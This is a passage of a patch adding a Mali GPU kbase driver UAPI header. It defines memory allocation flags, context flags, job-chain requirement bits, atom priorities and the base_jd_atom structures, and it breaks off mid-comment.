+#define BASE_MEM_RESERVED_BIT_8 ((base_mem_alloc_flags)1 << 8)
+
+/* Grow backing store on GPU Page Fault
+ */
+#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9)
+
+/* Page coherence Outer shareable, if available
+ */
+#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10)
+
+/* Page coherence Inner shareable
+ */
+#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11)
+
+/* IN/OUT */
+/* Should be cached on the CPU, returned if actually cached
+ */
+#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12)
+
+/* IN/OUT */
+/* Must have same VA on both the GPU and the CPU
+ */
+#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13)
+
+/* OUT */
+/* Must call mmap to acquire a GPU address for the allocation
+ */
+#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14)
+
+/* IN */
+/* Page coherence Outer shareable, required.
+ */
+#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15)
+
+/* Protected memory
+ */
+#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16)
+
+/* Not needed physical memory
+ */
+#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17)
+
+/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the
+ * addresses to be the same
+ */
+#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18)
+
+/**
+ * Bit 19 is reserved.
+ *
+ * Do not remove, use the next unreserved bit for new flags
+ */
+#define BASE_MEM_RESERVED_BIT_19 ((base_mem_alloc_flags)1 << 19)
+
+/**
+ * Memory starting from the end of the initial commit is aligned to 'extension'
+ * pages, where 'extension' must be a power of 2 and no more than
+ * BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
+ */
+#define BASE_MEM_TILER_ALIGN_TOP ((base_mem_alloc_flags)1 << 20)
+
+/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu
+ * mode. Some components within the GPU might only be able to access memory
+ * that is GPU cacheable. Refer to the specific GPU implementation for more
+ * details. The 3 shareability flags will be ignored for GPU uncached memory.
+ * If used while importing USER_BUFFER type memory, then the import will fail
+ * if the memory is not aligned to GPU and CPU cache line width.
+ */
+#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21)
+
+/*
+ * Bits [22:25] for group_id (0~15).
+ *
+ * base_mem_group_id_set() should be used to pack a memory group ID into a
+ * base_mem_alloc_flags value instead of accessing the bits directly.
+ * base_mem_group_id_get() should be used to extract the memory group ID from
+ * a base_mem_alloc_flags value.
+ */
+#define BASEP_MEM_GROUP_ID_SHIFT 22
+#define BASE_MEM_GROUP_ID_MASK \
+ ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT)
+
+/* Must do CPU cache maintenance when imported memory is mapped/unmapped
+ * on GPU. Currently applicable to dma-buf type only.
+ */
+#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26)
+
+/* Use the GPU VA chosen by the kernel client */
+#define BASE_MEM_FLAG_MAP_FIXED ((base_mem_alloc_flags)1 << 27)
+
+/* OUT */
+/* Kernel side cache sync ops required */
+#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28)
+
+/* Force trimming of JIT allocations when creating a new allocation */
+#define BASEP_MEM_PERFORM_JIT_TRIM ((base_mem_alloc_flags)1 << 29)
+
+/* Number of bits used as flags for base memory management
+ *
+ * Must be kept in sync with the base_mem_alloc_flags flags
+ */
+#define BASE_MEM_FLAGS_NR_BITS 30
+
+/* A mask of all the flags which are only valid for allocations within kbase,
+ * and may not be passed from user space.
+ */
+#define BASEP_MEM_FLAGS_KERNEL_ONLY \
+ (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE | \
+ BASE_MEM_FLAG_MAP_FIXED | BASEP_MEM_PERFORM_JIT_TRIM)
+
+/* A mask for all output bits, excluding IN/OUT bits.
+ */
+#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP
+
+/* A mask for all input bits, including IN/OUT bits.
+ */
+#define BASE_MEM_FLAGS_INPUT_MASK \
+ (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK)
+
+/* A mask of all currently reserved flags
+ */
+#define BASE_MEM_FLAGS_RESERVED \
+ (BASE_MEM_RESERVED_BIT_8 | BASE_MEM_RESERVED_BIT_19)
+
+#define BASEP_MEM_INVALID_HANDLE (0ull << 12)
+#define BASE_MEM_MMU_DUMP_HANDLE (1ull << 12)
+#define BASE_MEM_TRACE_BUFFER_HANDLE (2ull << 12)
+#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
+#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ull << 12)
+/* reserved handles ..-47< for future special handles */
+#define BASE_MEM_COOKIE_BASE (64ul << 12)
+#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << 12) + \
+ BASE_MEM_COOKIE_BASE)
+
+/* Similar to BASE_MEM_TILER_ALIGN_TOP, memory starting from the end of the
+ * initial commit is aligned to 'extension' pages, where 'extension' must be a power
+ * of 2 and no more than BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
+ */
+#define BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP (1 << 0)
+
+/**
+ * If set, the heap info address points to a __u32 holding the used size in bytes;
+ * otherwise it points to a __u64 holding the lowest address of unused memory.
+ */
+#define BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE (1 << 1)
+
+/**
+ * Valid set of just-in-time memory allocation flags
+ *
+ * Note: BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE cannot be set if heap_info_gpu_addr
+ * in %base_jit_alloc_info is 0 (atom with BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE set
+ * and heap_info_gpu_addr being 0 will be rejected).
+ */
+#define BASE_JIT_ALLOC_VALID_FLAGS \
+ (BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP | BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE)
+
+/**
+ * typedef base_context_create_flags - Flags to pass to ::base_context_init.
+ *
+ * Flags can be ORed together to enable multiple things.
+ *
+ * These share the same space as BASEP_CONTEXT_FLAG_*, and so must
+ * not collide with them.
+ */
+typedef __u32 base_context_create_flags;
+
+/* No flags set */
+#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0)
+
+/* Base context is embedded in a cctx object (flag used for CINSTR
+ * software counter macros)
+ */
+#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0)
+
+/* Base context is a 'System Monitor' context for Hardware counters.
+ *
+ * One important side effect of this is that job submission is disabled.
+ */
+#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \
+ ((base_context_create_flags)1 << 1)
+
+/* Bit-shift used to encode a memory group ID in base_context_create_flags
+ */
+#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3)
+
+/* Bitmask used to encode a memory group ID in base_context_create_flags
+ */
+#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \
+ ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT)
+
+/* Bitpattern describing the base_context_create_flags that can be
+ * passed to the kernel
+ */
+#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \
+ (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | \
+ BASEP_CONTEXT_MMU_GROUP_ID_MASK)
+
+/* Bitpattern describing the ::base_context_create_flags that can be
+ * passed to base_context_init()
+ */
+#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \
+ (BASE_CONTEXT_CCTX_EMBEDDED | BASEP_CONTEXT_CREATE_KERNEL_FLAGS)
+
+/*
+ * Private flags used on the base context
+ *
+ * These start at bit 31, and run down to zero.
+ *
+ * They share the same space as base_context_create_flags, and so must
+ * not collide with them.
+ */
+
+/* Private flag tracking whether job descriptor dumping is disabled */
+#define BASEP_CONTEXT_FLAG_JOB_DUMP_DISABLED \
+ ((base_context_create_flags)(1 << 31))
+
+/* Enable additional tracepoints for latency measurements (TL_ATOM_READY,
+ * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST)
+ */
+#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0)
+
+/* Indicate that job dumping is enabled. This could affect certain timers
+ * to account for the performance impact.
+ */
+#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1)
+
+#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \
+ BASE_TLSTREAM_JOB_DUMPING_ENABLED)
+/*
+ * Dependency stuff, keep it private for now. May want to expose it if
+ * we decide to make the number of semaphores a configurable
+ * option.
+ */
+#define BASE_JD_ATOM_COUNT 256
+
+/* Maximum number of concurrent render passes.
+ */
+#define BASE_JD_RP_COUNT (256)
+
+/* Set/reset values for a software event */
+#define BASE_JD_SOFT_EVENT_SET ((unsigned char)1)
+#define BASE_JD_SOFT_EVENT_RESET ((unsigned char)0)
+
+/**
+ * struct base_jd_udata - Per-job data
+ *
+ * This structure is used to store per-job data, and is completely unused
+ * by the Base driver. It can be used to store things such as callback
+ * function pointer, data to handle job completion. It is guaranteed to be
+ * untouched by the Base driver.
+ *
+ * @blob: per-job data array
+ */
+struct base_jd_udata {
+ __u64 blob[2];
+};
+
+/**
+ * typedef base_jd_dep_type - Job dependency type.
+ *
+ * A flags field will be inserted into the atom structure to specify whether a
+ * dependency is a data or ordering dependency (by putting it before/after
+ * 'core_req' in the structure it should be possible to add without changing
+ * the structure size).
+ * When the flag is set for a particular dependency to signal that it is an
+ * ordering only dependency then errors will not be propagated.
+ */
+typedef __u8 base_jd_dep_type;
+
+#define BASE_JD_DEP_TYPE_INVALID (0) /**< Invalid dependency */
+#define BASE_JD_DEP_TYPE_DATA (1U << 0) /**< Data dependency */
+#define BASE_JD_DEP_TYPE_ORDER (1U << 1) /**< Order dependency */
+
+/**
+ * typedef base_jd_core_req - Job chain hardware requirements.
+ *
+ * A job chain must specify what GPU features it needs to allow the
+ * driver to schedule the job correctly. By not specifying the
+ * correct settings can/will cause an early job termination. Multiple
+ * values can be ORed together to specify multiple requirements.
+ * Special case is ::BASE_JD_REQ_DEP, which is used to express complex
+ * dependencies, and that doesn't execute anything on the hardware.
+ */
+typedef __u32 base_jd_core_req;
+
+/* Requirements that come from the HW */
+
+/* No requirement, dependency only
+ */
+#define BASE_JD_REQ_DEP ((base_jd_core_req)0)
+
+/* Requires fragment shaders
+ */
+#define BASE_JD_REQ_FS ((base_jd_core_req)1 << 0)
+
+/* Requires compute shaders
+ *
+ * This covers any of the following GPU job types:
+ * - Vertex Shader Job
+ * - Geometry Shader Job
+ * - An actual Compute Shader Job
+ *
+ * Compare this with BASE_JD_REQ_ONLY_COMPUTE, which specifies that the
+ * job is specifically just the "Compute Shader" job type, and not the "Vertex
+ * Shader" nor the "Geometry Shader" job type.
+ */
+#define BASE_JD_REQ_CS ((base_jd_core_req)1 << 1)
+
+/* Requires tiling */
+#define BASE_JD_REQ_T ((base_jd_core_req)1 << 2)
+
+/* Requires cache flushes */
+#define BASE_JD_REQ_CF ((base_jd_core_req)1 << 3)
+
+/* Requires value writeback */
+#define BASE_JD_REQ_V ((base_jd_core_req)1 << 4)
+
+/* SW-only requirements - the HW does not expose these as part of the job slot
+ * capabilities
+ */
+
+/* Requires fragment job with AFBC encoding */
+#define BASE_JD_REQ_FS_AFBC ((base_jd_core_req)1 << 13)
+
+/* SW-only requirement: coalesce completion events.
+ * If this bit is set then completion of this atom will not cause an event to
+ * be sent to userspace, whether successful or not; completion events will be
+ * deferred until an atom completes which does not have this bit set.
+ *
+ * This bit may not be used in combination with BASE_JD_REQ_EXTERNAL_RESOURCES.
+ */
+#define BASE_JD_REQ_EVENT_COALESCE ((base_jd_core_req)1 << 5)
+
+/* SW Only requirement: the job chain requires a coherent core group. We don't
+ * mind which coherent core group is used.
+ */
+#define BASE_JD_REQ_COHERENT_GROUP ((base_jd_core_req)1 << 6)
+
+/* SW Only requirement: The performance counters should be enabled only when
+ * they are needed, to reduce power consumption.
+ */
+#define BASE_JD_REQ_PERMON ((base_jd_core_req)1 << 7)
+
+/* SW Only requirement: External resources are referenced by this atom.
+ *
+ * This bit may not be used in combination with BASE_JD_REQ_EVENT_COALESCE and
+ * BASE_JD_REQ_SOFT_EVENT_WAIT.
+ */
+#define BASE_JD_REQ_EXTERNAL_RESOURCES ((base_jd_core_req)1 << 8)
+
+/* SW Only requirement: Software defined job. Jobs with this bit set will not be
+ * submitted to the hardware but will cause some action to happen within the
+ * driver
+ */
+#define BASE_JD_REQ_SOFT_JOB ((base_jd_core_req)1 << 9)
+
+#define BASE_JD_REQ_SOFT_DUMP_CPU_GPU_TIME (BASE_JD_REQ_SOFT_JOB | 0x1)
+#define BASE_JD_REQ_SOFT_FENCE_TRIGGER (BASE_JD_REQ_SOFT_JOB | 0x2)
+#define BASE_JD_REQ_SOFT_FENCE_WAIT (BASE_JD_REQ_SOFT_JOB | 0x3)
+
+/* 0x4 RESERVED for now */
+
+/* SW only requirement: event wait/trigger job.
+ *
+ * - BASE_JD_REQ_SOFT_EVENT_WAIT: this job will block until the event is set.
+ * - BASE_JD_REQ_SOFT_EVENT_SET: this job sets the event, thus unblocks the
+ * other waiting jobs. It completes immediately.
+ * - BASE_JD_REQ_SOFT_EVENT_RESET: this job resets the event, making it
+ * possible for other jobs to wait upon. It completes immediately.
+ */
+#define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5)
+#define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6)
+#define BASE_JD_REQ_SOFT_EVENT_RESET (BASE_JD_REQ_SOFT_JOB | 0x7)
+
+#define BASE_JD_REQ_SOFT_DEBUG_COPY (BASE_JD_REQ_SOFT_JOB | 0x8)
+
+/* SW only requirement: Just In Time allocation
+ *
+ * This job requests a single or multiple just-in-time allocations through a
+ * list of base_jit_alloc_info structure which is passed via the jc element of
+ * the atom. The number of base_jit_alloc_info structures present in the
+ * list is passed via the nr_extres element of the atom
+ *
+ * It should be noted that the id entry in base_jit_alloc_info must not
+ * be reused until it has been released via BASE_JD_REQ_SOFT_JIT_FREE.
+ *
+ * Should this soft job fail it is expected that a BASE_JD_REQ_SOFT_JIT_FREE
+ * soft job to free the JIT allocation is still made.
+ *
+ * The job will complete immediately.
+ */
+#define BASE_JD_REQ_SOFT_JIT_ALLOC (BASE_JD_REQ_SOFT_JOB | 0x9)
+
+/* SW only requirement: Just In Time free
+ *
+ * This job requests a single or multiple just-in-time allocations created by
+ * BASE_JD_REQ_SOFT_JIT_ALLOC to be freed. The ID list of the just-in-time
+ * allocations is passed via the jc element of the atom.
+ *
+ * The job will complete immediately.
+ */
+#define BASE_JD_REQ_SOFT_JIT_FREE (BASE_JD_REQ_SOFT_JOB | 0xa)
+
+/* SW only requirement: Map external resource
+ *
+ * This job requests external resource(s) are mapped once the dependencies
+ * of the job have been satisfied. The list of external resources are
+ * passed via the jc element of the atom which is a pointer to a
+ * base_external_resource_list.
+ */
+#define BASE_JD_REQ_SOFT_EXT_RES_MAP (BASE_JD_REQ_SOFT_JOB | 0xb)
+
+/* SW only requirement: Unmap external resource
+ *
+ * This job requests external resource(s) are unmapped once the dependencies
+ * of the job has been satisfied. The list of external resources are
+ * passed via the jc element of the atom which is a pointer to a
+ * base_external_resource_list.
+ */
+#define BASE_JD_REQ_SOFT_EXT_RES_UNMAP (BASE_JD_REQ_SOFT_JOB | 0xc)
+
+/* HW Requirement: Requires Compute shaders (but not Vertex or Geometry Shaders)
+ *
+ * This indicates that the Job Chain contains GPU jobs of the 'Compute
+ * Shaders' type.
+ *
+ * In contrast to BASE_JD_REQ_CS, this does not indicate that the Job
+ * Chain contains 'Geometry Shader' or 'Vertex Shader' jobs.
+ */
+#define BASE_JD_REQ_ONLY_COMPUTE ((base_jd_core_req)1 << 10)
+
+/* HW Requirement: Use the base_jd_atom::device_nr field to specify a
+ * particular core group
+ *
+ * If both BASE_JD_REQ_COHERENT_GROUP and this flag are set, this flag
+ * takes priority
+ *
+ * This is only guaranteed to work for BASE_JD_REQ_ONLY_COMPUTE atoms.
+ *
+ * If the core availability policy is keeping the required core group turned
+ * off, then the job will fail with a BASE_JD_EVENT_PM_EVENT error code.
+ */
+#define BASE_JD_REQ_SPECIFIC_COHERENT_GROUP ((base_jd_core_req)1 << 11)
+
+/* SW Flag: If this bit is set then the successful completion of this atom
+ * will not cause an event to be sent to userspace
+ */
+#define BASE_JD_REQ_EVENT_ONLY_ON_FAILURE ((base_jd_core_req)1 << 12)
+
+/* SW Flag: If this bit is set then completion of this atom will not cause an
+ * event to be sent to userspace, whether successful or not.
+ */
+#define BASEP_JD_REQ_EVENT_NEVER ((base_jd_core_req)1 << 14)
+
+/* SW Flag: Skip GPU cache clean and invalidation before starting a GPU job.
+ *
+ * If this bit is set then the GPU's cache will not be cleaned and invalidated
+ * until a GPU job starts which does not have this bit set or a job completes
+ * which does not have the BASE_JD_REQ_SKIP_CACHE_END bit set. Do not use
+ * if the CPU may have written to memory addressed by the job since the last job
+ * without this bit set was submitted.
+ */
+#define BASE_JD_REQ_SKIP_CACHE_START ((base_jd_core_req)1 << 15)
+
+/* SW Flag: Skip GPU cache clean and invalidation after a GPU job completes.
+ *
+ * If this bit is set then the GPU's cache will not be cleaned and invalidated
+ * until a GPU job completes which does not have this bit set or a job starts
+ * which does not have the BASE_JD_REQ_SKIP_CACHE_START bit set. Do not use
+ * if the CPU may read from or partially overwrite memory addressed by the job
+ * before the next job without this bit set completes.
+ */
+#define BASE_JD_REQ_SKIP_CACHE_END ((base_jd_core_req)1 << 16)
+
+/* Request the atom be executed on a specific job slot.
+ *
+ * When this flag is specified, it takes precedence over any existing job slot
+ * selection logic.
+ */
+#define BASE_JD_REQ_JOB_SLOT ((base_jd_core_req)1 << 17)
+
+/* SW-only requirement: The atom is the start of a renderpass.
+ *
+ * If this bit is set then the job chain will be soft-stopped if it causes the
+ * GPU to write beyond the end of the physical pages backing the tiler heap, and
+ * committing more memory to the heap would exceed an internal threshold. It may
+ * be resumed after running one of the job chains attached to an atom with
+ * BASE_JD_REQ_END_RENDERPASS set and the same renderpass ID. It may be
+ * resumed multiple times until it completes without memory usage exceeding the
+ * threshold.
+ *
+ * Usually used with BASE_JD_REQ_T.
+ */
+#define BASE_JD_REQ_START_RENDERPASS ((base_jd_core_req)1 << 18)
+
+/* SW-only requirement: The atom is the end of a renderpass.
+ *
+ * If this bit is set then the atom incorporates the CPU address of a
+ * base_jd_fragment object instead of the GPU address of a job chain.
+ *
+ * Which job chain is run depends upon whether the atom with the same renderpass
+ * ID and the BASE_JD_REQ_START_RENDERPASS bit set completed normally or
+ * was soft-stopped when it exceeded an upper threshold for tiler heap memory
+ * usage.
+ *
+ * It also depends upon whether one of the job chains attached to the atom has
+ * already been run as part of the same renderpass (in which case it would have
+ * written unresolved multisampled and otherwise-discarded output to temporary
+ * buffers that need to be read back). The job chain for doing a forced read and
+ * forced write (from/to temporary buffers) is run as many times as necessary.
+ *
+ * Usually used with BASE_JD_REQ_FS.
+ */
+#define BASE_JD_REQ_END_RENDERPASS ((base_jd_core_req)1 << 19)
+
+/* SW-only requirement: The atom needs to run on a limited core mask affinity.
+ *
+ * If this bit is set then the kbase_context.limited_core_mask will be applied
+ * to the affinity.
+ */
+#define BASE_JD_REQ_LIMITED_CORE_MASK ((base_jd_core_req)1 << 20)
+
+/* These requirement bits are currently unused in base_jd_core_req
+ */
+#define BASEP_JD_REQ_RESERVED \
+ (~(BASE_JD_REQ_ATOM_TYPE | BASE_JD_REQ_EXTERNAL_RESOURCES | \
+ BASE_JD_REQ_EVENT_ONLY_ON_FAILURE | BASEP_JD_REQ_EVENT_NEVER | \
+ BASE_JD_REQ_EVENT_COALESCE | \
+ BASE_JD_REQ_COHERENT_GROUP | BASE_JD_REQ_SPECIFIC_COHERENT_GROUP | \
+ BASE_JD_REQ_FS_AFBC | BASE_JD_REQ_PERMON | \
+ BASE_JD_REQ_SKIP_CACHE_START | BASE_JD_REQ_SKIP_CACHE_END | \
+ BASE_JD_REQ_JOB_SLOT | BASE_JD_REQ_START_RENDERPASS | \
+ BASE_JD_REQ_END_RENDERPASS | BASE_JD_REQ_LIMITED_CORE_MASK))
+
+/* Mask of all bits in base_jd_core_req that control the type of the atom.
+ *
+ * This allows dependency only atoms to have flags set
+ */
+#define BASE_JD_REQ_ATOM_TYPE \
+ (BASE_JD_REQ_FS | BASE_JD_REQ_CS | BASE_JD_REQ_T | BASE_JD_REQ_CF | \
+ BASE_JD_REQ_V | BASE_JD_REQ_SOFT_JOB | BASE_JD_REQ_ONLY_COMPUTE)
+
+/**
+ * Mask of all bits in base_jd_core_req that control the type of a soft job.
+ */
+#define BASE_JD_REQ_SOFT_JOB_TYPE (BASE_JD_REQ_SOFT_JOB | 0x1f)
+
+/* Returns non-zero value if core requirements passed define a soft job or
+ * a dependency only job.
+ */
+#define BASE_JD_REQ_SOFT_JOB_OR_DEP(core_req) \
+ (((core_req) & BASE_JD_REQ_SOFT_JOB) || \
+ ((core_req) & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP)
+
+/**
+ * enum kbase_jd_atom_state
+ *
+ * @KBASE_JD_ATOM_STATE_UNUSED: Atom is not used.
+ * @KBASE_JD_ATOM_STATE_QUEUED: Atom is queued in JD.
+ * @KBASE_JD_ATOM_STATE_IN_JS: Atom has been given to JS (is runnable/running).
+ * @KBASE_JD_ATOM_STATE_HW_COMPLETED: Atom has been completed, but not yet
+ * handed back to job dispatcher for
+ * dependency resolution.
+ * @KBASE_JD_ATOM_STATE_COMPLETED: Atom has been completed, but not yet handed
+ * back to userspace.
+ */
+enum kbase_jd_atom_state {
+ KBASE_JD_ATOM_STATE_UNUSED,
+ KBASE_JD_ATOM_STATE_QUEUED,
+ KBASE_JD_ATOM_STATE_IN_JS,
+ KBASE_JD_ATOM_STATE_HW_COMPLETED,
+ KBASE_JD_ATOM_STATE_COMPLETED
+};
+
+/**
+ * typedef base_atom_id - Type big enough to store an atom number in.
+ */
+typedef __u8 base_atom_id;
+
+/**
+ * struct base_dependency -
+ *
+ * @atom_id: An atom number
+ * @dependency_type: Dependency type
+ */
+struct base_dependency {
+ base_atom_id atom_id;
+ base_jd_dep_type dependency_type;
+};
+
+/**
+ * struct base_jd_fragment - Set of GPU fragment job chains used for rendering.
+ *
+ * @norm_read_norm_write: Job chain for full rendering.
+ * GPU address of a fragment job chain to render in the
+ * circumstance where the tiler job chain did not exceed
+ * its memory usage threshold and no fragment job chain
+ * was previously run for the same renderpass.
+ * It is used no more than once per renderpass.
+ * @norm_read_forced_write: Job chain for starting incremental
+ * rendering.
+ * GPU address of a fragment job chain to render in
+ * the circumstance where the tiler job chain exceeded
+ * its memory usage threshold for the first time and
+ * no fragment job chain was previously run for the
+ * same renderpass.
+ * Writes unresolved multisampled and normally-
+ * discarded output to temporary buffers that must be
+ * read back by a subsequent forced_read job chain
+ * before the renderpass is complete.
+ * It is used no more than once per renderpass.
+ * @forced_read_forced_write: Job chain for continuing incremental
+ * rendering.
+ * GPU address of a fragment job chain to render in
+ * the circumstance where the tiler job chain
+ * exceeded its memory usage threshold again
+ * and a fragment job chain was previously run for
+ * the same renderpass.
+ * Reads unresolved multisampled and
+ * normally-discarded output from temporary buffers
+ * written by a previous forced_write job chain and
+ * writes the same to temporary buffers again.
+ * It is used as many times as required until
+ * rendering completes.
+ * @forced_read_norm_write: Job chain for ending incremental rendering.
+ * GPU address of a fragment job chain to render in the
+ * circumstance where the tiler job chain did not
+ * exceed its memory usage threshold this time and a
+ * fragment job chain was previously run for the same
+ * renderpass.
+ * Reads unresolved multisampled and normally-discarded
+ * output from temporary buffers written by a previous
+ * forced_write job chain in order to complete a
+ * renderpass.
+ * It is used no more than once per renderpass.
+ *
+ * This structure is referenced by the main atom structure if
+ * BASE_JD_REQ_END_RENDERPASS is set in the base_jd_core_req.
+ */
+struct base_jd_fragment {
+ __u64 norm_read_norm_write;
+ __u64 norm_read_forced_write;
+ __u64 forced_read_forced_write;
+ __u64 forced_read_norm_write;
+};
+
+/**
+ * typedef base_jd_prio - Base Atom priority.
+ *
+ * Only certain priority levels are actually implemented, as specified by the
+ * BASE_JD_PRIO_<...> definitions below. It is undefined to use a priority
+ * level that is not one of those defined below.
+ *
+ * Priority levels only affect scheduling after the atoms have had dependencies
+ * resolved. For example, a low priority atom that has had its dependencies
+ * resolved might run before a higher priority atom that has not had its
+ * dependencies resolved.
+ *
+ * In general, fragment atoms do not affect non-fragment atoms with
+ * lower priorities, and vice versa. One exception is that there is only one
+ * priority value for each context. So a high-priority (e.g.) fragment atom
+ * could increase its context priority, causing its non-fragment atoms to also
+ * be scheduled sooner.
+ *
+ * The atoms are scheduled as follows with respect to their priorities:
+ * * Let atoms 'X' and 'Y' be for the same job slot who have dependencies
+ * resolved, and atom 'X' has a higher priority than atom 'Y'
+ * * If atom 'Y' is currently running on the HW, then it is interrupted to
+ * allow atom 'X' to run soon after
+ * * If instead neither atom 'Y' nor atom 'X' are running, then when choosing
+ * the next atom to run, atom 'X' will always be chosen instead of atom 'Y'
+ * * Any two atoms that have the same priority could run in any order with
+ * respect to each other. That is, there is no ordering constraint between
+ * atoms of the same priority.
+ *
+ * The sysfs file 'js_ctx_scheduling_mode' is used to control how atoms are
+ * scheduled between contexts. The default value, 0, will cause higher-priority
+ * atoms to be scheduled first, regardless of their context. The value 1 will
+ * use a round-robin algorithm when deciding which context's atoms to schedule
+ * next, so higher-priority atoms can only preempt lower priority atoms within
+ * the same context. See KBASE_JS_SYSTEM_PRIORITY_MODE and
+ * KBASE_JS_PROCESS_LOCAL_PRIORITY_MODE for more details.
+ */
+typedef __u8 base_jd_prio;
+
+/* Medium atom priority. This is a priority higher than BASE_JD_PRIO_LOW */
+#define BASE_JD_PRIO_MEDIUM ((base_jd_prio)0)
+/* High atom priority. This is a priority higher than BASE_JD_PRIO_MEDIUM and
+ * BASE_JD_PRIO_LOW
+ */
+#define BASE_JD_PRIO_HIGH ((base_jd_prio)1)
+/* Low atom priority. */
+#define BASE_JD_PRIO_LOW ((base_jd_prio)2)
+/* Real-Time atom priority. This is a priority higher than BASE_JD_PRIO_HIGH,
+ * BASE_JD_PRIO_MEDIUM, and BASE_JD_PRIO_LOW
+ */
+#define BASE_JD_PRIO_REALTIME ((base_jd_prio)3)
+
+/* Count of the number of priority levels. This itself is not a valid
+ * base_jd_prio setting
+ */
+#define BASE_JD_NR_PRIO_LEVELS 4
+
+/**
+ * struct base_jd_atom_v2 - Node of a dependency graph used to submit a
+ * GPU job chain or soft-job to the kernel driver.
+ *
+ * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
+ * is set in the base_jd_core_req) the CPU address of a
+ * base_jd_fragment object.
+ * @udata: User data.
+ * @extres_list: List of external resources.
+ * @nr_extres: Number of external resources or JIT allocations.
+ * @jit_id: Zero-terminated array of IDs of just-in-time memory
+ * allocations written to by the atom. When the atom
+ * completes, the value stored at the
+ * &struct_base_jit_alloc_info.heap_info_gpu_addr of
+ * each allocation is read in order to enforce an
+ * overall physical memory usage limit.
+ * @pre_dep: Pre-dependencies. One need to use SETTER function to assign
+ * this field; this is done in order to reduce possibility of
+ * improper assignment of a dependency field.
+ * @atom_number: Unique number to identify the atom.
+ * @prio: Atom priority. Refer to base_jd_prio for more details.
+ * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
+ * specified.
+ * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
+ * @core_req: Core requirements.
+ * @renderpass_id: Renderpass identifier used to associate an atom that has
+ * BASE_JD_REQ_START_RENDERPASS set in its core requirements
+ * with an atom that has BASE_JD_REQ_END_RENDERPASS set.
+ * @padding: Unused. Must be zero.
+ *
+ * This structure has changed since UK 10.2 for which base_jd_core_req was a
+ * __u16 value.
+ *
+ * In UK 10.3 a core_req field of a __u32 type was added to the end of the
+ * structure, and the place in the structure previously occupied by __u16
+ * core_req was kept but renamed to compat_core_req.
+ *
+ * From UK 11.20 - compat_core_req is now occupied by __u8 jit_id[2].
+ * Compatibility with UK 10.x from UK 11.y is not handled because
+ * the major version increase prevents this.
+ *
+ * For UK 11.20 jit_id[2] must be initialized to zero.
+ */
+struct base_jd_atom_v2 {
+ __u64 jc;
+ struct base_jd_udata udata;
+ __u64 extres_list;
+ __u16 nr_extres;
+ __u8 jit_id[2];
+ struct base_dependency pre_dep[2];
+ base_atom_id atom_number;
+ base_jd_prio prio;
+ __u8 device_nr;
+ __u8 jobslot;
+ base_jd_core_req core_req;
+ __u8 renderpass_id;
+ __u8 padding[7];
+};
+
+/**
+ * struct base_jd_atom - Same as base_jd_atom_v2, but has an extra seq_nr
+ * at the beginning.
+ *
+ * @seq_nr: Sequence number of logical grouping of atoms.
+ * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
+ * is set in the base_jd_core_req) the CPU address of a
+ * base_jd_fragment object.
+ * @udata: User data.
+ * @extres_list: List of external resources.
+ * @nr_extres: Number of external resources or JIT allocations.
+ * @jit_id: Zero-terminated array of IDs of just-in-time memory
+ * allocations written to by the atom. When the atom
+ * completes, the value stored at the
+ * &struct_base_jit_alloc_info.heap_info_gpu_addr of
